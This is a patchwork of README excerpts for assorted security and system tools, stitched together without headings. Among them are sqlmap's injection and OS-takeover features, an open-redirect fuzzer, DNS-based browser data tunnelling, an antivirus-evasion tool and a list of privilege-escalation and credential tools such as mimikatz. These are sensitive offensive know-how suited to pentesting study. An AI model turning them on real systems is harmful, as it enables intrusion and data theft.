ada, applescript, c, c#, c++, coldfusion, golang, haskell, html, java, javascript,
jsp, lua, pascal, perl, php, powershell, python, ruby, scala, sql, swift, xml

pip3 install hardcodes

git clone https://github.com/s0md3v/hardcodes && cd hardcodes && python3 setup.py install

from hardcodes import search

string = "console.log('hello there')"
result = search(string, lang="common", comments="parse")
print(result)

Output: ['hello there']

python cli.py /path/to/file.ext

python cli.py -r /path/to/dir

python cli.py -o /path/to/file.ext

python cli.py -l 'golang' /path/to/file.go

• ignore ignore the comments completely
• parse parse the comments like code
• string add comments to list of hardcoded strings

• Terraform installed
• Ansible installed
• SSH private and public keys
• Google Cloud Platform or Digital Ocean account.

git clone --depth 1 https://github.com/aaaguirrep/vps-docker-for-pentest.git vps
cd vps

• Create credentials folder.
  

  mkdir credentials

• Create a new project.
• Create service account with "Compute Admin" role and download a key in json format in credentials folder.
• Rename the key to pentest.json
• Enable "Compute Engine API" for the project.

• Create a Personal access tokens with write permission and copy it. See Tutorial

• Inside credentials folder run ssh-keygen -t rsa -f pentest in the terminal. Empty passphrase is ok.
• It creates two files: private and public key.

• Enter to gcp folder and modify the next value:
  • In main.tf file change the project value with your project-id.
• Run the next commands:

# Initialize terraform provider
$ terraform init
Terraform has been successfully initialized!

# Create the resources
$ terraform apply -auto-approve
Apply complete! Resources: 3 added, 0 changed, 0 destroyed.
Outputs:
external_ip = x.x.x.x

• Copy the external_ip value

• Enter to digital-ocean folder
• With the personal access token copied run export TF_VAR_do_token="Personal_Access_Token_Here"
• Run the next commands:

# Initialize terraform provider
$ terraform init
Terraform has been successfully initialized!

# Create the resources
$ terraform apply -auto-approve
Apply complete! Resources: 3 added, 0 changed, 0 destroyed.
Outputs:
external_ip = x.x.x.x

• Copy the external_ip value

• Enter to ansible folder
• In hosts.yaml change the x.x.x.x by external_ip value copied.
• Run the next command:

$ ansible-playbook playbook.yaml
TASK [Configuration finished] *******************************************************
ok: [x.x.x.x] => {
    "msg": "System configured correctly."
}

• In gcp or digital-ocean folder run the next command. Change x.x.x.x by external_ip value copied.

# Access to VPS
$ ssh pentest@x.x.x.x -i ../credentials/pentest

• In gcp or digital-ocean folder run the next command.

# Destroy the resource
$ terraform destroy -auto-approve

• Create on demand OpenVPN Endpoints in AWS that can easily be destroyed after done only pay for what you use.

1. Create a virtualenv:

mkvirtualenv -p python3 env/
source env/bin/activate

2. Install dependencies by running pip install -r requirements.txt
   
3. Ensure that you have an AWS .credentials file by running:
   

vi ~/.aws/credentials

[default]
aws_access_key_id = (your_access_key_here)
aws_secret_access_key = (your_secret_key_here)

4. Install OpenVPN client (if needed)

1. Ensure dependencies are all installed.
2. Clone repo to system.

git clone https://github.com/ttlequals0/autovpn.git

3. To create SSH keypair execute autovpn with -G and -r options for AWS region of choice. (optional) NOTE: Make sure to add new key to your ssh-agent.

./autovpn -G -r us-east-1

4. Execute autovpn with -C -k and -r options to deploy to AWS:

./autovpn -C -r us-east-1 -k us-east-1_vpnkey

4. OpenVPN config files are downloaded to current working directory.
5. Import the OpenVPN config file and connect:

sudo openvpn us-east-1_aws_vpn.ovpn

DESCRIPTION:
    autovpn - On Demand AWS OpenVPN Endpoint Deployment Tool.
 Project found at https://github.com/ttlequals0/autovpn
USAGE:
        ACTION  [OPTIONS]
       -C    Create VPN endpoint.
       -D    Delete keypair from region.
       -G    Generate new keypair.
       -S    Get all running instances in a given region.
       -T    Terminate a OpenVPN endpoint.
       -d    Specify custom DNS server. (ex. 4.2.2.1)
       -h    Displays this message.
       -i    AWS Instance type (Optional, Default is t2.micro)
      t2.nano t2.micro t2.small t2.medium t2.large.**
       -k    Specify the name of AWS keypair (Required)
       -m    Allow multiple connections to same endpoint.
       -r    Specify AWS Region (Required)
      us-east-1 us-west-1 us-east-2 us-west-2 eu-west-1 eu-west-2
      eu-west-3 eu-central-1 eu-north-1 ap-southeast-1 ap-northeast-1
      ap-northeast-2 ap-northeast-3    ap-southeast-2 sa-east-1
       ap-east-1 ca-central-1 me-south-1
       -p    Specify custom OpenVPN UDP port
       -u    Specify custom ssh user.***
       -y    Skip confirmations
       -z    Specify instance id.
EXAMPLES:
  Create OpenVPN endpoint:
 autovpn -C -r us-east-1 -k us-east-1_vpnkey
  Generate keypair in a region.
 autovpn -G -r us-east-1
  Get running instances
 autovpn -S -r us-east-1
  Terminate OpenVPN endpoint
 autovpn -T -r us-east-1 -z i-b933e00c
  Using custom options
    autovpn -C -r us-east-1 -k us-east-1_vpnkey -a ami-fce3c696 -u ec2_user -i m3.medium
NOTES:
        * - Custom AMI may be needed if changing instance type.
        ** - Any instance size can be given but the t2.micro is more than enough.
        *** - Custom user might be need if using a custom ami.
 **** - AWS IAM u   ser must have EC2 or Administrator permissions set.

• Continue to update documentation
• Add deletion of Securoty Group if it is no longer in use.
• Add ability to create more client configs for one endpoint.
• Pull Requests are welcome.

• Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
• Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
• Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
• Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
• Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
• Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
• Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
• Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
• Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

python sqlmap.py -h

python sqlmap.py -hh

• Homepage: http://sqlmap.org
• Download: .tar.gz or .zip
• Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
• Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
• User's manual: https://github.com/sqlmapproject/sqlmap/wiki
• Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
• Twitter: @sqlmap
• Demos: http://www.youtube.com/user/inquisb/videos
• Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

• Takes a url or list of urls and fuzzes them for Open redirect issues
• You can specify your own payloads in 'payloads.txt'
• Shows Location header history (if any)
• Fast (as it is Asynchronous)
• umm thats it , nothing much !

$ git clone https://github.com/devanshbatham/OpenRedireX
$ cd OpenRedireX
$ python3 -m venv env
$ source env/bin/activate
Note : The "FUZZ" is important and the url must be in double qoutes ! 
$ python3.7 openredirex.py -u "https://vulnerable.com/?url=FUZZ" -p payloads.txt --keyword FUZZ

$ python3.7 openredirex.py -u "https://vulnerable.com/?url=FUZZ" -p payloads.txt --keyword FUZZ

$ python3.7 openredirex.py -l urls.txt -p payloads.txt --keyword FUZZ

• Deploys a pentest adversary Linux VM and Docker container (AriaCloud) accessible over RDP
• Deploys one (1) Windows 2019 Domain Controller and three (3) Windows 10 Pro Endpoints
• Automatically joins the three Windows 10 computers to the AD Domain
• Uses Terraform templates to automatically deploy in Azure with VMs
• Terraform templates write Ansible Playbook configuration, which can be customized
• Automatically uploads Badblood (but does not install) if you prefer to generate thousands of simulated users https://github.com/davidprowe/BadBlood
• Post-deployment Powershell script provisions three domain users on the 2019 Domain Controller and can be customized for many more
• Domain Users: olivia (Domain Admin); lars (Domain User); liem (Domain User)
• All Domain User passwords: Password123
• Domain: RTC.LOCAL
• Domain Administrator Creds: RTCAdmin:Password123
• Deploys four IP subnets
• Deploys intentionally insecure Azure Network Security Groups (NSGs) that allow RDP, WinRM (5985, 5986), and SSH from the Public Internet. Secure this as per your requirements. WinRM is used to automatically provision the hosts.
• Post-deploy Powershell script that adds registry entries on each Windows 10 Pro endpoint to automatically log in each username into the Domain as respective user. This feature simulates a real AD environment with workstations with interactive domain logons. When you attempt to RDP into the endpoints, simulated adversary is met with:

• Azure subscription
• Terraform: Tested on v0.12.26
• Ansible: Tested on 2.9.6

$ sudo apt-get install ansible

az ad sp create-for-rbac --role="Contributor" --scopes="/subscriptions/<subscription_id>

az login --service-principal -u <service_principal_name> -p "<service_principal_password>" --tenant "<service_principal_tenant>"

subscription_id = ""
client_id = ""
client_secret = ""
tenant_id = ""

$ git clone https://github.com/iknowjason/PurpleCloud.git

cd PurpleCloud/deploy
vi terraform.tfvars

subscription_id = ""
client_id = ""
client_secret = ""
tenant_id = ""

subscription_id = "aa9d8c9f-34c2-6262-89ff-3c67527c1b22"
client_id = "7e9c2cce-8bd4-887d-b2b0-90cd1e6e4781"
client_secret = ":+O$+adfafdaF-?%:.?d/EYQLK6po9`|E<["
tenant_id = "8b6817d9-f209-2071-8f4f-cc03332847cb"

$ cd PurpleCloud/deploy
$ terraform init
$ terraform apply -var-file=terraform.tfvars -auto-approve

module.dc1-vm.null_resource.provision-dc-users (local-exec): TASK [dc : debug] **************************************************************
module.dc1-vm.null_resource.provision-dc-users (local-exec): ok: [52.255.151.90] => {
module.dc1-vm.null_resource.provision-dc-users (local-exec):     "results.stdout_lines": [
module.dc1-vm.null_resource.provision-dc-users (local-exec):         "WARNING: Error initializing default drive: 'Unable to find a default server with Active Directory Web Services ",
module.dc1-vm.null_resource.provision-dc-users (local-exec):         "running.'."
module.dc1-vm.null_resource.provision-dc-users (local-exec):     ]
module.dc1-vm.null_resource.provision-dc-users (local-exec): }

module.adversary1-vm.null_resource.ansible-deploy (local-exec): fatal: [40.121.138.118]: FAILED! => {"changed": false, "msg": "Failed to update apt cache: "}

ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook -i ./hosts.cfg --private-key ssh_key.pem ./playbook.yml

$ cd ../modules/dc1-vm/
$ ansible-playbook -i hosts.cfg playbook.yml

$ cd ../win10-vm-1/
$ ansible-playbook -i hosts.cfg playbook.yml

$ cd ../win10-vm-2/
$ ansible-playbook -i hosts.cfg playbook.yml

$ cd ../win10-vm-3/
$ ansible-playbook -i hosts.cfg playbook.yml

• AWS Terraform Deployment
• Blue Team - Endpoint visibility with Sysmon on endpoints
• Blue Team - Endpoint visibility with Velociraptor agent on endpoints

• Easy to use, with a game inspired menu system.
• Full mouse support, all buttons with a highlighted key is clickable and mouse scroll works in process list and menu boxes.
• Fast and responsive UI with UP, DOWN keys process selection.
• Function for showing detailed stats for selected process.
• Ability to filter processes, multiple filters can be entered.
• Easy switching between sorting options.
• Send SIGTERM, SIGKILL, SIGINT to selected process.
• UI menu for changing all config file options.
• Auto scaling graph for network usage.
• Shows message in menu if new version is available
• Shows current read and write speeds for disks

• 24-bit truecolor (See list of terminals with truecolor support)
• Wide characters (Are sometimes problematic in web-based terminals)

• Unicode Block “Braille Patterns” U+2800 - U+28FF
• Unicode Block “Geometric Shapes” U+25A0 - U+25FF
• Unicode Block "Box Drawing" and "Block Elements" U+2500 - U+259F

Install python3 and git with a package manager of you choice

Install psutil python module (sudo might be required)

python3 -m pip install psutil

Install homebrew if not already installed

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"

Install python3 if not already installed

brew install python3 git

Install psutil python module

python3 -m pip install psutil

Install optional dependency osx-cpu-temp

brew install osx-cpu-temp

Install with pkg and pip

sudo pkg install python3 git
sudo python3 -m ensurepip
sudo python3 -m pip install psutil

Clone and install

git clone https://github.com/aristocratos/bpytop.git
cd bpytop
sudo make install

to uninstall it

sudo make uninstall

#? Config file for bpytop v. 1.0.0

#* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme.
#* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai"
color_theme="Default"

#* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs.
update_ms=2000

#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive",
#* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly.
proc_sorting="cpu lazy"

#* Reverse sorting order, True or False.
proc_reversed=False

#* Show processes as a tree
proc_tree=False

#* Use the cpu graph colors in the process list.
proc_colors=True

#* Use a darkening gradient in the process list.
proc_gradient=True

#* If process cpu usage should be of the core it's running on or usage of the total available cpu power.
proc_per_core=False

#* Check cpu temperature, needs "vcgencmd" on Raspberry Pi and "osx-cpu-temp" on MacOS X.
check_temp=True

#* Draw a clock at top of screen, formatting according to strftime, empty string to disable.
draw_clock="%X"

#* Update main ui in background when menus are showing, set this to false if the menus is flickering too much for comfort.
background_update=True

#* Custom cpu model name, empty string to disable.
custom_cpu_name=""

#* Opti   onal filter for shown disks, should be last folder in path of a mountpoint, "root" replaces "/", separate multiple values with comma.
#* Begin line with "exclude=" to change to exclude filter, oterwise defaults to "most include" filter. Example: disks_filter="exclude=boot, home"
disks_filter=""

#* Show graphs instead of meters for memory values.
mem_graphs=True

#* If swap memory should be shown in memory box.
show_swap=False

#* Show swap as a disk, ignores show_swap value above, inserts itself after first disk.
swap_disk=True

#* If mem box should be split to also show disks info.
show_disks=True

#* Show init screen at startup, the init screen is purely cosmetical
show_init=True

#* Enable check for new version from github.com/aristocratos/bpytop at start.
update_check=True

#* Enable start in mini mode, can be toggled with shift+m at any time.
mini_mode=False

#* Set loglevel for    "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG".
#* The level set includes all lower levels, i.e. "DEBUG" will show all logging info.
log_level=WARNING

USAGE: bpytop [argument]    Arguments:      -m, --mini            Start in minimal mode without memory and net boxes      -v, --version         Show version info and exit      -h, --help            Show this help message and exit      --debug               Start with loglevel set to DEBUG overriding value set in config  

• See TODOs from Bashtop.

1. A server, written in golang, functions as an authoritative DNS server which collects and decodes messages sent by browsertunnel.
2. A small javascript library, found in the html/ folder, encodes and sends messages from the client side.

t1  IN NS t1ns.example.com.
t1ns  IN A 192.0.2.123

go get github.com/veggiedefender/browsertunnel

browsertunnel t1.example.com

$ browsertunnel -help
Usage of browsertunnel:
  -deletionInterval int
     seconds in between checks for expired messages (default 5)
  -expiration int
     seconds an incomplete message is retained before it is deleted (default 60)
  -maxMessageSize int
     maximum encoded size (in bytes) of a message (default 5000)
  -port int
     port to run on (default 53)

• Write messages to a database instead of printing them to stdout
• Transpile or rewrite the client code to work with older browsers
• Make the ID portion of the domain larger or smaller, depending on the amount of traffic you get, and ID collisions you expect
• Authenticate and encrypt messages for secrecy and tamper-resistance (remember that DNS is a plaintext protocol)

• ... at cluster scope
  

  rakkess

• ... in some namespace
  

  rakkess --namespace default

• ... with verbs
  

  rakkess --verbs get,delete,watch,patch

• ... for another user
  

  rakkess --as other-user

• ... for another service-account
  

  rakkess --sa kube-system:namespace-controller

• ... and combine with common kubectl parameters
  

  KUBECONFIG=otherconfig rakkess --context other-context

• ...globally in all namespaces (only considers ClusterRoleBindings)
  

  rakkess resource configmaps

• ...in a given namespace (considers RoleBindings and ClusterRoleBindings)
  

  rakkess resource configmaps -n default

• ...with shorthand notation
  

  rakkess r cm   # same as rakkess resource configmaps

• .. with custom verbs
  

  rakkess r cm --verbs get,delete,watch,patch

kubectl krew install access-matrix

curl -LO https://github.com/corneliusweig/rakkess/releases/download/v0.4.4/rakkess-amd64-linux.tar.gz \
&& tar xf rakkess-amd64-linux.tar.gz rakkess-amd64-linux \
&& chmod +x rakkess-amd64-linux \
&& mv -i rakkess-amd64-linux $GOPATH/bin/rakkess

curl -LO https://github.com/corneliusweig/rakkess/releases/download/v0.4.4/rakkess-amd64-darwin.tar.gz \
&& tar xf rakkess-amd64-darwin.tar.gz rakkess-amd64-darwin \
&& chmod +x rakkess-amd64-darwin \
&& mv -i rakkess-amd64-darwin $GOPATH/bin/rakkess

• go 1.13 or newer
• GNU make
• git

export PLATFORMS=$(go env GOOS)
make all   # binaries will be placed in out/

• docker

mkdir rakkess && chdir rakkess
curl -Lo Dockerfile https://raw.githubusercontent.com/corneliusweig/rakkess/master/Dockerfile
docker build . -t rakkess-builder
docker run --rm -v $PWD:/go/bin/ --env PLATFORMS=$(go env GOOS) rakkess
docker rmi rakkess-builder

• Standalone or interactively.
• As a service integrated with your CI/CD to bring security/compliance/best-practice enforcement to your build pipeline
• As a component integrated into existing container monitoring and control frameworks via integration with its RESTful API.

• Alpine
• Amazon Linux 2
• CentOS
• Debian
• Google Distroless
• Oracle Linux
• Red Hat Enterprise Linux
• Red Hat Universal Base Image (UBI)
• Ubuntu

• GEM
• Java Archive (jar, war, ear)
• NPM
• Python (PIP)

• Anchore Engine Installation

curl https://docs.anchore.com/current/docs/engine/quickstart/docker-compose.yaml > docker-compose.yaml
docker-compose up -d

--u   TEXT   Username     eg. admin
--p   TEXT   Password     eg. foobar
--url TEXT   Service URL  eg. http://localhost:8228/v1

ANCHORE_CLI_URL=http://myserver.example.com:8228/v1
ANCHORE_CLI_USER=admin
ANCHORE_CLI_PASS=foobar

anchore-cli image add docker.io/library/debian:latest

anchore-cli image wait docker.io/library/debian:latest

anchore-cli image list

anchore-cli image get docker.io/library/debian:latest

anchore-cli system feeds list
anchore-cli system wait

anchore-cli image vuln docker.io/library/debian:latest os

anchore-cli image content docker.io/library/debian:latest os

anchore-cli evaluate check docker.io/library/debian:latest

anchore-cli policy hub --help
anchore-cli policy hub list

pip install safety

safety check

+==============================================================================+
|                                                                              |
|                               /$$$$$$            /$$                         |
|                              /$$__  $$          | $$                         |
|           /$$$$$$$  /$$$$$$ | $$  \__//$$$$$$  /$$$$$$   /$$   /$$           |
|          /$$_____/ |____  $$| $$$$   /$$__  $$|_  $$_/  | $$  | $$           |
|         |  $$$$$$   /$$$$$$$| $$_/  | $$$$$$$$  | $$    | $$  | $$           |
|          \____  $$ /$$__  $$| $$    | $$_____/  | $$ /$$| $$  | $$           |
|          /$$$$$$$/|  $$$$$$$| $$    |  $$$$$$$  |  $$$$/|  $$$$$$$           |
|         |_______/  \_______/|__/     \_______/   \___/   \____  $$           |
|                                                          /$$  | $$           |
|                                                         |  $$$$$$/           |
|  by pyup.io                                              \______/            |
|                                                                              |
+==============================================================================+
| REPORT                                                                       |
+==============================================================================+
| No known security vulnerabilities found.                                     |
+==============================================================================+

pip install insecure-package

+==============================================================================+
|                                                                              |
|                               /$$$$$$            /$$                         |
|                              /$$__  $$          | $$                         |
|           /$$$$$$$  /$$$$$$ | $$  \__//$$$$$$  /$$$$$$   /$$   /$$           |
|          /$$_____/ |____  $$| $$$$   /$$__  $$|_  $$_/  | $$  | $$           |
|         |  $$$$$$   /$$$$$$$| $$_/  | $$$$$$$$  | $$    | $$  | $$           |
|          \____  $$ /$$__  $$| $$    | $$_____/  | $$ /$$| $$  | $$           |
|          /$$$$$$$/|  $$$$$$$| $$    |  $$$$$$$  |  $$$$/|  $$$$$$$           |
|         |_______/  \_______/|__/     \_______/   \___/   \____  $$           |
|                                                          /$$  | $$           |
|                                                         |  $$$$$$/           |
|  by pyup.io                                              \______/            |
|                                                                              |
+==============================================================================+
| REPORT                                                                       |
+==========================+===============+===================+===============+
| package                  | installed     | affected          | source        |
+==========================+===============+===================+===============+
| insecure-package         | 0.1.0         | <0.2.0            | changelog     |
+==========================+===============+===================+===============+

safety check -r requirements.txt

cat requirements.txt | safety check --stdin

pip freeze | safety check --stdin

echo "insecure-package==0.1" | safety check --stdin

echo "insecure-package==0.1" | docker run -i --rm pyupio/safety safety check --stdin
cat requirements.txt | docker run -i --rm pyupio/safety safety check --stdin

install:
  - pip install safety

script:
  - safety check

safety:
  script:
    - pip install safety
    - safety check

[tox]
envlist = py37

[testenv]
deps =
    safety
    pytest
commands =
    safety check
    pytest

safety check --key=12345-ABCDEFGH

safety check --db=/home/safety-db/data

safety check --json

[
    [
        "django",
        "<1.2.2",
        "1.2",
        "Cross-site scripting (XSS) vulnerability in Django 1.2.x before 1.2.2 allows remote attackers to inject arbitrary web script or HTML via a csrfmiddlewaretoken (aka csrf_token) cookie.",
        "25701"
    ]
]

safety check --full-report

+==============================================================================+
|                                                                              |
|                               /$$$$$$            /$$                         |
|                              /$$__  $$          | $$                         |
|           /$$$$$$$  /$$$$$$ | $$  \__//$$$$$$  /$$$$$$   /$$   /$$           |
|          /$$_____/ |____  $$| $$$$   /$$__  $$|_  $$_/  | $$  | $$           |
|         |  $$$$$$   /$$$$$$$| $$_/  | $$$$$$$$  | $$    | $$  | $$           |
|          \____  $$ /$$__  $$| $$    | $$_____/  | $$ /$$| $$  | $$           |
|          /$$$$$$$/|  $$$$$$$| $$    |  $$$$$$$  |  $$$$/|  $$$$$$$           |
|         |_______/  \_______/|__/     \_______/   \___/   \____  $$           |
|                                                          /$$  | $$           |
|                                                         |  $$$$$$/           |
|  by pyup.io                                              \______/            |
|                                                                              |
+==============================================================================+
| REPORT                                                                       |
+============================+===========+==========================+==========+
| package                    | installed | affected                 | ID       |
+============================+===========+==========================+==========+
| django                     | 1.2       | <1.2.2                   | 25701    |
+==============================================================================+
| Cross-site scripting (XSS) vulnerability in Django 1.2.x before 1.2.2 allows |
|  remote attackers to inject arbitrary web script or HTML via a csrfmiddlewar |
| etoken (aka csrf_token)    cookie.                                           |
+==============================================================================+

safety check --bare

cryptography django

safety check --cache

cat requirements.txt | safety check --stdin

pip freeze | safety check --stdin

echo "insecure-package==0.1" | safety check --stdin

safety check -r requirements.txt

safety check --file=requirements.txt

safety check -r req_dev.txt -r req_prod.txt

safety check -i 1234

safety check --ignore=1234

safety check -i 1234 -i 4567 -i 89101

safety check -o insecure_report.txt

safety check --output --json insecure_report.json

safety check -f insecure.json

safety check --file=insecure.json

safety review -r insecure.json --full-report

+==============================================================================+
|                                                                              |
|                               /$$$$$$            /$$                         |
|                              /$$__  $$          | $$                         |
|           /$$$$$$$  /$$$$$$ | $$  \__//$$$$$$  /$$$$$$   /$$   /$$           |
|          /$$_____/ |____  $$| $$$$   /$$__  $$|_  $$_/  | $$  | $$           |
|         |  $$$$$$   /$$$$$$$| $$_/  | $$$$$$$$  | $$    | $$  | $$           |
|          \____  $$ /$$__  $$| $$    | $$_____/  | $$ /$$| $$  | $$           |
|          /$$$$$$$/|  $$$$$$$| $$    |  $$$$$$$  |  $$$$/|  $$$$$$$           |
|         |_______/  \_______/|__/     \_______/   \___/   \____  $$           |
|                                                          /$$  | $$           |
|                                                         |  $$$$$$/           |
|  by pyup.io                                              \______/            |
|                                                                              |
+==============================================================================+
| REPORT                                                                       |
+============================+===========+==========================+==========+
| package                    | installed | affected                 | ID       |
+============================+===========+==========================+==========+
| django                     | 1.2       | <1.2.2                   | 25701    |
+==============================================================================+
| Cross-site scripting (XSS) vulnerability in Django 1.2.x before 1.2.2 allows |
|  remote attackers to inject arbitrary web script or HTML via a csrfmiddlewar |
| etoken (aka csrf_token)    cookie.                                           |
+==============================================================================+

safety review --file report.json --bare

django

1. Add YARA signatures. Per default, YARA rules for file scans are read from filescan.yar, procscan.yar for file scans, process memory scans, respectively. The following options exist for providing rules files to Spyre (and will be tried in this order):
   
   1. Add the rule files to ZIP file and append that file to the binary.
   2. Add the rule files to a ZIP file name $PROGRAM.zip: If the Spyre binary is called spyre or spyre.exe, use spyre.zip.
   3. Put the rule files into the same directory as the binary.
   ZIP file contents may be encrypted using the password infected (AV industry standard) to prevent antivirus software from mistaking parts of the ruleset as malicious content and preventing the scan.
   YARA rule files may contain include statements.
   
2. Deploy, run the scanner
   
3. Collect report
   

• plain, the default, a simple human-readable text format
• tsjson, a JSON document that can be imported into Timesketch

• --disable-magic
• --disable-cuckoo
• --enable-dotnet
• --enable-macho
• --enable-dex

• make
• gcc
• gcc-multilib
• gcc-mingw-w64
• autoconf
• automake
• libtool
• pkg-config
• wget
• patch
• sed
• golang-$VERSION-go, e.g. golang-1.8-go. The Makefile will automatically select the newest version unless GOROOT has been set.
• git-core
• ca-certificates
• zip

docker build . -t avcleaner
docker run -v ~/dev/scrt/avcleaner:/home/toto -it avcleaner bash #adapt ~/dev/scrt/avcleaner to the path where you cloned avcleaner
sudo pacman -Syu
mkdir CMakeBuild && cd CMakeBuild
cmake ..
make -j 2
./avcleaner.bin --help

avcleaner.bin test/strings_simplest.c --strings=true --

CommandLine Error: Option 'non-global-value-max-name-size' registered more than once! LLVM ERROR: inconsistency in registered CommandLine options

$ go build

$ GOOS=windows GOARCH=amd64 go build -o monsoon.exe

yay -S monsoon

$ ./monsoon -h
Usage:
  monsoon command [options]

Available Commands:
fuzz        Execute and filter HTTP requests
  help        Help about any command
  show        Construct and display an HTTP request
  test        Send an HTTP request to a server and show the result
  version     Display version information

Options:
  -h, --help   help for monsoon

Use "monsoon [command] --help" for more information about a command.

$ go get -u github.com/hahwul/mzap

$ sudo snap install mzap --devmode

$ brew tap hahwul/mzap
$ brew install mzap

Usage:
  mzap [command]

Available Commands:
  ajaxspider  Add AjaxSpider ZAP
  ascan       Add ActiveScan ZAP
  help        Help about any command
spider      Add ZAP spider
  stop        Stop Scanning
  version     Show version

Flags:
      --apikey string   ZAP API Key / if you disable apikey, not use this option
      --apis string     ZAP API Host(s) address
                        e.g --apis http://localhost:8090,http://192.168.0.4:8090 (default "http://localhost:8090")
      --config string   config file (default is $HOME/.mzap.yaml)
  -h, --help            help for mzap
      --urls string     URL list file / e.g --urls hosts.txt

$ mzap spider --urls sample/target.txt
INFO[0000] Start                                         Prefix=/JSON/spider/action/scan/ Size of Target=17
INFO[0000] Added                                         Target="http://testphp.vulnweb.com/" ZAP API="http://localhost:8090"
INFO[0000] Added                                         Target="http://www.hahwul.com" ZAP API="http://localhost:8090"

$ git clone https://github.com/som3canadian/Some-Tools
$ cd Some-Tools
$ ./sometools.sh setup
# after setup, open new terminal or tab
$ ./sometools.sh list
# you can look in your .zshrc or .bashrc if you are not sure that the installation worked.
# For more info see Actions Detailed section.

• setup - Set up the environment (Create bin dir and set bin dir to your $PATH)
• help - Show this menu
• info - Show README.md of an installed tool
• list - List all tools (Installed tools will appear in a different color)
• list-cat - List all tools of a Category (Installed tools will appear in a different color)
• list-installed - List all installed tools
• install - Install a tool
• install-cat - Install all tools of a Category
• install-all - Install all tools
• check-update - Check Update for an installed tools and Update it if you want (Only for tools from a git repo)
• check-update-all - Check Update for all installed tools
• self-update - Check Update for Some-Tools and Update if you want
• add-tool - Create template for a new tool (./sometools.sh add-tool newtoolname category)
• uninstall - Uninstall a tool (Trying uninstall with the tool built-in uninstall.sh before Cleaning from our project)
• uninstall-cat - Uninstall all tools of a Category
• complete-uninstall - Delete all installed tools, remove bin directory and delete our modification in .zshrc or .bashrc

# Inital setup. Should be the first command
$ ./sometools.sh setup
# List all available tools
$ ./sometools.sh list
# List all available tools of a category
$ ./sometools.sh list-cat
# List install tool(s)
$ ./sometools.sh list-installed
# Install a tool
$ ./sometools.sh install unicorn
# Using ID instead of tool name
$ ./sometools.sh install 4
# Install all tools of a Category
$ ./sometools.sh install-cat PrivEsc-Win
# Install All tools
$ ./sometools.sh install all
# Show README.md of an installed tool
$ ./sometools.sh info unicorn
# Using ID instead of tool name
$ ./sometools.sh info 4
# Check for update
$ ./sometools.sh check-update PEAS
# Using ID instead of tool name
$ ./sometools.sh check-update 9
# Check update for all installed tools
$ ./sometools.sh check-update all
# Add a new tool
$ ./sometools.sh add-tool newtoolname PrivEsc-Lin
# Uninstall a too   l
$ ./sometools.sh uninstall unicorn
# Using ID instead of tool name
$ ./sometools.sh uninstall 4
# Unistall all tools of a Category
$ ./sometools.sh uninstall-cat PrivEsc-Win
# Update some-tools
$ ./sometools.sh self-update
# Delete all installed tools, remove bin directory and delete our modification in .zshrc or .bashrc
$ ./sometools.sh complete-uninstall

• The bin directory will be create when doing the setup action. This will be the dir path that we will add to our shell $PATH (../../../Some-Tools/bin). In the bin dir we will put copy(symlink) of tool(s) that we want executable everywhere on our machine.For example a tool like unicorn.py, you may want to execute unicorn from everywhere you want.
  
• The setup action will aslo create bin/PrivEsc-Lin and bin/PrivEsc-Win in the process. In this directories we will keep our privilege escalation scripts. So, when you want to use your tools, you can fire a python http server and quickly upload the scripts you desire. The scripts in those folders will be update at the same time you update the tool(s) with check-update action.
  

$ ./sometools.sh list

# In order, columns are: ID, category name and tool name
[1] Evasion/Bashfuscator
[2] Evasion/PyFuscation
[3] Evasion/tvasion
[4] Evasion/unicorn
[5] Exploit-Win/windows-kernel-exploits
[6] PrivEsc-Lin/BeRoot
[7] PrivEsc-Lin/LinEnum
[8] PrivEsc-Lin/LinPwn
[9] PrivEsc-Lin/PEAS
[10] PrivEsc-Lin/SUID3NUM
[11] PrivEsc-Lin/SetUID
[12] PrivEsc-Lin/linux-enum-mod
[13] PrivEsc-Lin/linux-exploit-suggester
[14] PrivEsc-Lin/linux-exploit-suggester-2
[15] PrivEsc-Lin/linuxprivchecker
[16] PrivEsc-Lin/lse
[17] PrivEsc-Lin/pspy
[18] PrivEsc-Lin/setuid-wrapper
[19] PrivEsc-Lin/unix-privesc-check
[20] PrivEsc-Win/JAWS
[21] PrivEsc-Win/Powerless
[22] PrivEsc-Win/Privesc
[23] PrivEsc-Win/SessionGopher
[24] PrivEsc-Win/Sherlock
[25] PrivEsc-Win/WinPwn
[26] PrivEsc-Win/Windows-Exploit-Suggester
[27] PrivEsc-Win/Windows-Privilege-Escalation
[28] Pr   ivEsc-Win/mimikatz
[29] PrivEsc-Win/windows-privesc-check
[30] Utilities/SirepRAT
